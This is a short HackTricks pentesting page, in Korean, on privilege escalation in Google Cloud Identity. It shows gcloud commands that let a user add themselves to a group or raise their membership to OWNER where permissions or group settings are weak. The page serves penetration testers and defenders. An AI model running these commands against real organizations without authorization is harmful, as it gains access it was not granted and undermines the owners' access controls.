GCP - Cloudidentity Privesc

Support HackTricks

Cloudidentity

cloudidentity 서비스에 대한 자세한 정보는 이 페이지를 확인하세요:

자신을 그룹에 추가하기

사용자에게 충분한 권한이 있거나 그룹이 잘못 구성된 경우, 그는 자신을 새로운 그룹의 구성원으로 만들 수 있습니다:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

그룹 구성원 수정

사용자에게 충분한 권한이 있거나 그룹이 잘못 구성된 경우, 그는 자신이 구성원인 그룹의 OWNER가 될 수 있습니다:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
HackTricks 지원하기

Last updated